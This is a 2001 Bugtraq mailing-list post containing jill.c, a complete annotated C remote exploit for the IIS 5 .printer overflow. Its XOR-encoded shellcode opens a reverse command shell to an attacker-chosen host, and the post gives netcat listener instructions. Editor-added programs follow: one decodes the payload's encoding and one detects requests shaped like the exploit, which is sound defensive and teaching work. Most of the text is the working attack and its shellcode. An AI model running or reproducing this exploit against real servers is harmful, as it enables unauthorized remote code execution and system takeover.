IIS 5 remote exploit.


Date: Thu, 3 May 2001 23:08:38 +1200
From: dark spyrit <dspyrit@BEAVUH.ORG>
To: BUGTRAQ@SECURITYFOCUS.COM
Subject: IIS 5 remote exploit.


 Here's an exploit for the IIS 5 hole.. it will give you a remote command
shell, reverse telnet style.

 We've only had a chance to test this on a couple of hosts, it should work
fine - if not, drop me a mail and I'll see what I can do to remedy the
situation.

 Read the comments for more info.

 dark spyrit/beavuh.


[attachment: jill.c]
/* IIS 5 remote .printer overflow. "jill.c" (don't ask).
*
*  by: dark spyrit <dspyrit@beavuh.org>
*
*  respect to eeye for finding this one - nice work.
*  shouts to halvar, neofight and the beavuh bitchez.
*
*  this exploit overwrites an exception frame to control eip and get to
*  our code.. the code then locates the pointer to our larger buffer and
*  execs.
*
*  usage: jill <victim host> <victim port> <attacker host> <attacker port>
*
*  the shellcode spawns a reverse cmd shell.. so you need to set up a
*  netcat listener on the host you control.
*
*  Ex: nc -l -p <attacker port> -vv
*
*  I haven't slept in years.
*/

#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <errno.h>
#include <stdint.h>
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <netdb.h>

int main(int argc, char *argv[]){

/* the whole request rolled into one, pretty huh? carez. */

unsigned char sploit[]=
/* "GET /NULL.printer " */
"\x47\x45\x54\x20\x2f\x4e\x55\x4c\x4c\x2e\x70\x72\x69\x6e\x74\x65\x72\x20"
/* "HTTP/1.0\r\nBeavuh: " - 36 bytes of request prefix so far. The 778-byte
 * value of the Beavuh: header that follows is the "larger buffer" from the
 * comment at the top; it runs up to the "\r\nHost: " further down. */
"\x48\x54\x54\x50\x2f\x31\x2e\x30\x0d\x0a\x42\x65\x61\x76\x75\x68\x3a\x20"
/* NOP sled, then a call/pop GetPC stub (jmp / pop ebp / jmp / call / add
 * ebp,0x15) and the decoder: mov eax,ebp / xor ecx,ecx / mov cx,0x2d7 /
 * push eax / xor byte [eax],0x95 / inc eax / loop.  0x2d7 = 727 bytes is
 * exactly the rest of the Beavuh: value, which is XOR-0x95 encoded so that
 * it contains no NUL bytes on the wire. */
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\xeb\x03\x5d\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc5\x15\x90\x90\x90"
"\x8b\xc5\x33\xc9\x66\xb9\xd7\x02\x50\x80\x30\x95\x40\xe2\xfa\x2d\x95\x95"
/* encoded reverse-shell payload.  sploit[441..442] and sploit[446..449] are
 * the sin_port and sin_addr immediates of the sockaddr_in it builds; main()
 * below patches them with the attacker port and address, pre-XORed with
 * 0x95 so the decoder loop turns them back into the real values. */
"\x64\xe2\x14\xad\xd8\xcf\x05\x95\xe1\x96\xdd\x7e\x60\x7d\x95\x95\x95\x95"
"\xc8\x1e\x40\x14\x7f\x9a\x6b\x6a\x6a\x1e\x4d\x1e\xe6\xa9\x96\x66\x1e\xe3"
"\xed\x96\x66\x1e\xeb\xb5\x96\x6e\x1e\xdb\x81\xa6\x78\xc3\xc2\xc4\x1e\xaa"
"\x96\x6e\x1e\x67\x2c\x9b\x95\x95\x95\x66\x33\xe1\x9d\xcc\xca\x16\x52\x91"
"\xd0\x77\x72\xcc\xca\xcb\x1e\x58\x1e\xd3\xb1\x96\x56\x44\x74\x96\x54\xa6"
"\x5c\xf3\x1e\x9d\x1e\xd3\x89\x96\x56\x54\x74\x97\x96\x54\x1e\x95\x96\x56"
"\x1e\x67\x1e\x6b\x1e\x45\x2c\x9e\x95\x95\x95\x7d\xe1\x94\x95\x95\xa6\x55"
"\x39\x10\x55\xe0\x6c\xc7\xc3\x6a\xc2\x41\xcf\x1e\x4d\x2c\x93\x95\x95\x95"
"\x7d\xce\x94\x95\x95\x52\xd2\xf1\x99\x95\x95\x95\x52\xd2\xfd\x95\x95\x95"
"\x95\x52\xd2\xf9\x94\x95\x95\x95\xff\x95\x18\xd2\xf1\xc5\x18\xd2\x85\xc5"
"\x18\xd2\x81\xc5\x6a\xc2\x55\xff\x95\x18\xd2\xf1\xc5\x18\xd2\x8d\xc5\x18"
"\xd2\x89\xc5\x6a\xc2\x55\x52\xd2\xb5\xd1\x95\x95\x95\x18\xd2\xb5\xc5\x6a"
"\xc2\x51\x1e\xd2\x85\x1c\xd2\xc9\x1c\xd2\xf5\x1e\xd2\x89\x1c\xd2\xcd\x14"
"\xda\xd9\x94\x94\x95\x95\xf3\x52\xd2\xc5\x95\x95\x18\xd2\xe5\xc5\x18\xd2"
"\xb5\xc5\xa6\x55\xc5\xc5\xc5\xff\x94\xc5\xc5\x7d\x95\x95\x95\x95\xc8\x14"
"\x78\xd5\x6b\x6a\x6a\xc0\xc5\x6a\xc2\x5d\x6a\xe2\x85\x6a\xc2\x71\x6a\xe2"
"\x89\x6a\xc2\x71\xfd\x95\x91\x95\x95\xff\xd5\x6a\xc2\x45\x1e\x7d\xc5\xfd"
"\x94\x94\x95\x95\x6a\xc2\x7d\x10\x55\x9a\x10\x3f\x95\x95\x95\xa6\x55\xc5"
"\xd5\xc5\xd5\xc5\x6a\xc2\x79\x16\x6d\x6a\x9a\x11\x02\x95\x95\x95\x1e\x4d"
"\xf3\x52\x92\x97\x95\xf3\x52\xd2\x97\x8e\xac\x52\xd2\x91\x5e\x38\x4c\xb3"
"\xff\x85\x18\x92\xc5\xc6\x6a\xc2\x61\xff\xa7\x6a\xc2\x49\xa6\x5c\xc4\xc3"
"\xc4\xc4\xc4\x6a\xe2\x81\x6a\xc2\x59\x10\x55\xe1\xf5\x05\x05\x05\x05\x15"
"\xab\x95\xe1\xba\x05\x05\x05\x05\xff\x95\xc3\xfd\x95\x91\x95\x95\xc0\x6a"
"\xe2\x81\x6a\xc2\x4d\x10\x55\xe1\xd5\x05\x05\x05\x05\xff\x95\x6a\xa3\xc0"
"\xc6\x6a\xc2\x6d\x16\x6d\x6a\xe1\xbb\x05\x05\x05\x05\x7e\x27\xff\x95\xfd"
"\x95\x91\x95\x95\xc0\xc6\x6a\xc2\x69\x10\x55\xe9\x8d\x05\x05\x05\x05\xe1"
"\x09\xff\x95\xc3\xc5\xc0\x6a\xe2\x8d\x6a\xc2\x41\xff\xa7\x6a\xc2\x49\x7e"
"\x1f\xc6\x6a\xc2\x65\xff\x95\x6a\xc2\x75\xa6\x55\x39\x10\x55\xe0\x6c\xc4"
/* from here to the "\r\nHost: " the encoded bytes are the NUL-separated
 * API names and "cmd.exe" the payload resolves (XOR each byte with 0x95
 * to read them). */
"\xc7\xc3\xc6\x6a\x47\xcf\xcc\x3e\x77\x7b\x56\xd2\xf0\xe1\xc5\xe7\xfa\xf6"
"\xd4\xf1\xf1\xe7\xf0\xe6\xe6\x95\xd9\xfa\xf4\xf1\xd9\xfc\xf7\xe7\xf4\xe7"
"\xec\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0\xc5\xfc\xe5\xf0\x95\xd2\xf0\xe1\xc6"
"\xe1\xf4\xe7\xe1\xe0\xe5\xdc\xfb\xf3\xfa\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0"
"\xc5\xe7\xfa\xf6\xf0\xe6\xe6\xd4\x95\xc5\xf0\xf0\xfe\xdb\xf4\xf8\xf0\xf1"
"\xc5\xfc\xe5\xf0\x95\xd2\xf9\xfa\xf7\xf4\xf9\xd4\xf9\xf9\xfa\xf6\x95\xc2"
"\xe7\xfc\xe1\xf0\xd3\xfc\xf9\xf0\x95\xc7\xf0\xf4\xf1\xd3\xfc\xf9\xf0\x95"
"\xc6\xf9\xf0\xf0\xe5\x95\xd0\xed\xfc\xe1\xc5\xe7\xfa\xf6\xf0\xe6\xe6\x95"
"\xd6\xf9\xfa\xe6\xf0\xdd\xf4\xfb\xf1\xf9\xf0\x95\xc2\xc6\xda\xd6\xde\xa6"
"\xa7\x95\xc2\xc6\xd4\xc6\xe1\xf4\xe7\xe1\xe0\xe5\x95\xe6\xfa\xf6\xfe\xf0"
"\xe1\x95\xf6\xf9\xfa\xe6\xf0\xe6\xfa\xf6\xfe\xf0\xe1\x95\xf6\xfa\xfb\xfb"
"\xf0\xf6\xe1\x95\xe6\xf0\xfb\xf1\x95\xe7\xf0\xf6\xe3\x95\xf6\xf8\xf1\xbb"
/* "\r\nHost: " followed by a 329-byte NOP sled.  The Host: value is the
 * field that overflows. */
"\xf0\xed\xf0\x95\x0d\x0a\x48\x6f\x73\x74\x3a\x20\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
/* end of the sled, then the 19-byte stub that runs once eip is ours:
 * xor eax,eax / mov al,0x90 / add ebx,eax / mov eax,[ebx] /
 * mov eax,[eax+0x60] / xor ebx,ebx / mov bl,0x24 / add eax,ebx / jmp eax.
 * It follows pointers from ebx to our request buffer (the "locates the
 * pointer to our larger buffer" in the comment at the top); 0x24 = 36 is
 * the length of the request prefix, so eax lands on the Beavuh: sled. */
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x33"
"\xc0\xb0\x90\x03\xd8\x8b\x03\x8b\x40\x60\x33\xdb\xb3\x24\x03\xc3\xff\xe0"
/* the overwritten exception registration record: a short jmp back into
 * the Host: sled (eb b9) in the next-record slot, 0x6a8c3105 in the
 * handler slot, then "\r\n\r\n" terminates the request. */
"\xeb\xb9\x90\x90\x05\x31\x8c\x6a\x0d\x0a\x0d\x0a";

	int			s;
	uint16_t		a_port;
	uint32_t		a_host;		/* was unsigned long: 8 bytes on LP64, so the
					 * *(unsigned long *)h_addr read overran the
					 * 4-byte address. */
	struct hostent		*ht;
	struct sockaddr_in	sin;

	printf("iis5 remote .printer overflow.\n"
		"dark spyrit <dspyrit@beavuh.org> / beavuh labs.\n");

	if (argc != 5){
		printf("usage: %s <victimHost> <victimPort> <attackerHost> <attackerPort>\n",argv[0]);
		exit(1);
	}

	if ((ht = gethostbyname(argv[1])) == 0){
		herror(argv[1]);
		exit(1);
	}

	memset(&sin, 0, sizeof(sin));
	sin.sin_port = htons(atoi(argv[2]));

	/* attacker port in network byte order, pre-XORed with 0x95 because the
	 * decoder loop in the payload XORs every byte of the encoded region. */
	a_port = htons(atoi(argv[4]));
	a_port ^= 0x9595;

	sin.sin_family = AF_INET;
	sin.sin_addr = *((struct in_addr *)ht->h_addr);

	if ((ht = gethostbyname(argv[3])) == 0){
		herror(argv[3]);
		exit(1);
	}

	memcpy(&a_host, ht->h_addr, sizeof(a_host));	/* 4 bytes, network order */
	a_host ^= 0x95959595;

	/* patch the sockaddr_in immediates inside the encoded payload:
	 * sin_port at sploit[441..442], sin_addr at sploit[446..449].
	 * caveat inherited from the original: a port byte or address octet equal
	 * to 0x95 (decimal 149) encodes to 0x00, and the strlen() in the write()
	 * below would then cut the request short. */
	sploit[441] = (a_port) & 0xff;
	sploit[442] = (a_port >> 8) & 0xff;

	sploit[446] = (a_host) & 0xff;
	sploit[447] = (a_host >> 8) & 0xff;
	sploit[448] = (a_host >> 16) & 0xff;
	sploit[449] = (a_host >> 24) & 0xff;

	if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1){
		perror("socket");
		exit(1);
	}

	printf("\nconnecting... \n");

	if ((connect(s, (struct sockaddr *) &sin, sizeof(sin))) == -1){
		perror("connect");
		exit(1);
	}

	/* the request is NUL-free by construction (see the caveat above), so
	 * strlen() gives its full length. */
	write(s, sploit, strlen(sploit));
	sleep (1);
	close (s);

	printf("sent... \nyou may need to send a carriage on your listener if the shell doesn't appear.\nhave fun!\n");
	return 0;
}
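The comment block in jill.c says the payload is XOR-encoded and main() pre-XORs the attacker port and address with 0x95 before patching them in. The following C program is an added example written for this page (editor's code, not part of jill.c or anything dark spyrit published) that isolates that encoding layer: `encode_target()` produces the six bytes jill.c writes at sploit[441..442] and sploit[446..449] and reports whether any of them came out as 0x00, which is the case in which jill.c's `write(s, sploit, strlen(sploit))` would silently truncate the request; `decode_strings()` applies the same XOR to a blob and pulls out the NUL-terminated ASCII runs, which is the quickest way to see what a blob like this one imports and executes. The sample bytes are three entries copied from the tail of the encoded shellcode on this page; the address 203.173.217.38:6969 used in main() is what the unpatched bytes at sploit[441..449] on this page decode to.

```c
/* Added example (editor's code, not jill.c): the XOR-0x95 layer of the
 * payload on this page.
 *
 * The decoder loop in the Beavuh: value (mov cx,0x2d7 / xor byte [eax],0x95 /
 * inc eax / loop) XORs the encoded region back before it runs, so main() in
 * jill.c XORs the attacker port and address with 0x95 before patching them
 * in.  Two consequences a practitioner wants to see:
 *   1. a plaintext byte of 0x95 (a port byte, or the octet 149) encodes to
 *      0x00 and strlen() in jill.c would truncate the request there;
 *   2. the API names and "cmd.exe" the shellcode needs are recoverable by
 *      XORing the blob with 0x95 and keeping the printable runs. */
#include <arpa/inet.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define XOR_KEY 0x95

/* Encode a TCP port and a dotted-quad IPv4 address the way jill.c does:
 * network byte order, every byte XORed with 0x95.  Returns how many of the
 * six encoded bytes are 0x00 (0 = safe to send with strlen()), or -1 if the
 * address does not parse. */
int encode_target(const char *ip, uint16_t port,
                  uint8_t port_out[2], uint8_t host_out[4])
{
    struct in_addr addr;
    int nuls = 0;

    if (inet_pton(AF_INET, ip, &addr) != 1)
        return -1;

    port_out[0] = ((port >> 8) & 0xff) ^ XOR_KEY;   /* htons(): high byte first */
    port_out[1] = (port & 0xff) ^ XOR_KEY;
    memcpy(host_out, &addr, 4);                     /* already network order */
    for (int i = 0; i < 4; i++)
        host_out[i] ^= XOR_KEY;

    for (int i = 0; i < 2; i++) nuls += (port_out[i] == 0);
    for (int i = 0; i < 4; i++) nuls += (host_out[i] == 0);
    return nuls;
}

/* XOR a blob with 0x95 and collect the printable runs of at least min_len
 * bytes that end at a non-printable byte (0x00 in the decoded shellcode).
 * Runs are written newline-separated into out; the count is returned.
 * Runs longer than 63 bytes are truncated, not split. */
size_t decode_strings(const uint8_t *enc, size_t len, size_t min_len,
                      char *out, size_t out_sz)
{
    char cur[64];
    size_t run = 0, used = 0, count = 0;

    out[0] = '\0';
    for (size_t i = 0; i <= len; i++) {
        /* a virtual 0 after the last byte flushes a run that ends the blob */
        uint8_t c = (i < len) ? (uint8_t)(enc[i] ^ XOR_KEY) : 0;
        if (c >= 0x20 && c < 0x7f) {
            if (run < sizeof cur) cur[run++] = (char)c;
            continue;
        }
        if (run >= min_len && used + run + 1 < out_sz) {
            memcpy(out + used, cur, run);
            used += run;
            out[used++] = '\n';
            out[used] = '\0';
            count++;
        }
        run = 0;
    }
    return count;
}

/* Three entries copied from the tail of the encoded shellcode on this page;
 * each ends with a raw 0x95 byte, i.e. an encoded 0x00 terminator. */
const uint8_t SAMPLE_ENC[] = {
    0xc6, 0xf9, 0xf0, 0xf0, 0xe5, 0x95,                      /* Sleep   */
    0xc2, 0xc6, 0xda, 0xd6, 0xde, 0xa6, 0xa7, 0x95,          /* WSOCK32 */
    0xf6, 0xf8, 0xf1, 0xbb, 0xf0, 0xed, 0xf0, 0x95,          /* cmd.exe */
};
const size_t SAMPLE_ENC_LEN = sizeof SAMPLE_ENC;

int main(void)
{
    uint8_t p[2], h[4];
    char out[128];

    /* what the unpatched sploit[441..449] on this page decodes to */
    int nuls = encode_target("203.173.217.38", 6969, p, h);
    printf("port %02x %02x  host %02x %02x %02x %02x  NUL bytes: %d\n",
           p[0], p[1], h[0], h[1], h[2], h[3], nuls);

    /* octet 149 == 0x95 encodes to 0x00: strlen() would stop there */
    printf("149.0.0.1 -> %d NUL byte(s) in the encoded address\n",
           encode_target("149.0.0.1", 6969, p, h));

    size_t n = decode_strings(SAMPLE_ENC, SAMPLE_ENC_LEN, 4, out, sizeof out);
    printf("%zu decoded strings:\n%s", n, out);
    return 0;
}
```

Running `decode_strings()` over the whole encoded region of sploit[] (indices 87 to 813) with `min_len` of 4 lists every import the payload resolves by name; the sockaddr_in immediates sit just before that string table, which is why jill.c can patch them at fixed offsets.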

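The request jill.c sends has a recognisable shape: a target ending in `.printer`, and a Host: header whose value is a few hundred bytes, most of them 0x90. The C program below is an added example (editor's code, not from the page or its author) of the check a proxy, IDS or log parser would run over such a request: it parses the request line and headers binary-safely, tests the target suffix case-insensitively with any query string removed, measures the Host: value and its longest run of 0x90 bytes, and flags the request when the target is a `.printer` resource and either measure exceeds a threshold. The thresholds are parameters; the values used in `main()` (255 bytes, 16 NOPs) are illustrative assumptions, not figures from this page. `build_sample()` constructs a request with the same layout as sploit[] but a plain NOP sled in place of the real payload.

```c
/* Added example (editor's code, not jill.c): a shape check for requests
 * like the one jill.c sends. */
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

struct printer_check {
    int    is_printer;   /* request target ends in ".printer" (case-insensitive) */
    size_t host_len;     /* byte length of the Host: header value */
    size_t nop_run;      /* longest run of 0x90 bytes inside that value */
    int    suspicious;   /* verdict under the thresholds passed in */
};

/* Length of the line starting at p (bytes before CRLF or LF); *eol receives
 * the offset of the next line.  A missing line terminator ends the line at rem. */
static size_t line_len(const unsigned char *p, size_t rem, size_t *eol)
{
    for (size_t i = 0; i < rem; i++) {
        if (p[i] == '\n') {
            *eol = i + 1;
            return (i > 0 && p[i - 1] == '\r') ? i - 1 : i;
        }
    }
    *eol = rem;
    return rem;
}

/* Does the header line start with name followed by ':' (case-insensitive)? */
static int header_is(const unsigned char *line, size_t len, const char *name)
{
    size_t n = strlen(name);
    if (len <= n || line[n] != ':') return 0;
    for (size_t i = 0; i < n; i++)
        if (tolower(line[i]) != tolower((unsigned char)name[i])) return 0;
    return 1;
}

/* Parse a raw HTTP request of len bytes.  Returns -1 if there is no request
 * line to parse, 0 otherwise with r filled in.  max_host is the longest
 * Host: value considered normal, max_nops the longest 0x90 run tolerated. */
int check_printer_request(const unsigned char *req, size_t len,
                          size_t max_host, size_t max_nops,
                          struct printer_check *r)
{
    size_t eol, ll, pos;
    memset(r, 0, sizeof *r);

    /* request line: METHOD SP target SP version */
    ll = line_len(req, len, &eol);
    const unsigned char *sp1 = memchr(req, ' ', ll);
    if (!sp1) return -1;
    const unsigned char *tgt = sp1 + 1;
    size_t tgt_max = ll - (size_t)(tgt - req);
    const unsigned char *sp2 = memchr(tgt, ' ', tgt_max);
    size_t tlen = sp2 ? (size_t)(sp2 - tgt) : tgt_max;
    const unsigned char *q = memchr(tgt, '?', tlen);   /* drop the query string */
    if (q) tlen = (size_t)(q - tgt);
    if (tlen >= 8) {
        const char *suffix = ".printer";
        size_t k;
        for (k = 0; k < 8 && tolower(tgt[tlen - 8 + k]) == suffix[k]; k++) ;
        r->is_printer = (k == 8);
    }

    /* header lines up to the empty line; binary-safe, no strlen() */
    pos = eol;
    while (pos < len) {
        ll = line_len(req + pos, len - pos, &eol);
        if (ll == 0) break;
        const unsigned char *line = req + pos;
        if (header_is(line, ll, "Host")) {
            size_t v = 5, run = 0;
            while (v < ll && (line[v] == ' ' || line[v] == '\t')) v++;
            r->host_len = ll - v;
            for (size_t i = v; i < ll; i++) {
                run = (line[i] == 0x90) ? run + 1 : 0;
                if (run > r->nop_run) r->nop_run = run;
            }
        }
        pos += eol;
    }
    r->suspicious = r->is_printer &&
                    (r->host_len > max_host || r->nop_run >= max_nops);
    return 0;
}

/* Constructed sample: same layout as sploit[] (a .printer target, a custom
 * header, a Host: value of nops bytes of 0x90) with no real payload.
 * Returns the request length, or 0 if buf is too small. */
size_t build_sample(unsigned char *buf, size_t sz, size_t nops)
{
    const char *head = "GET /NULL.printer HTTP/1.0\r\nBeavuh: AAAA\r\nHost: ";
    const char *tail = "\r\n\r\n";
    size_t hl = strlen(head), tl = strlen(tail);
    if (hl + nops + tl > sz) return 0;
    memcpy(buf, head, hl);
    memset(buf + hl, 0x90, nops);
    memcpy(buf + hl + nops, tail, tl);
    return hl + nops + tl;
}

int main(void)
{
    struct printer_check r;
    unsigned char buf[1024];
    const char *benign = "GET /NULL.printer HTTP/1.0\r\nHost: printers.example\r\n\r\n";

    check_printer_request((const unsigned char *)benign, strlen(benign), 255, 16, &r);
    printf("benign:  printer=%d host_len=%zu nop_run=%zu suspicious=%d\n",
           r.is_printer, r.host_len, r.nop_run, r.suspicious);

    size_t n = build_sample(buf, sizeof buf, 300);
    check_printer_request(buf, n, 255, 16, &r);
    printf("sample:  printer=%d host_len=%zu nop_run=%zu suspicious=%d\n",
           r.is_printer, r.host_len, r.nop_run, r.suspicious);
    return 0;
}
```

The 0x90 run is the weaker of the two signals: a sled can be built from any single-byte no-op instruction, so the Host: length bound is the check to keep even when the NOP test is tuned down.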
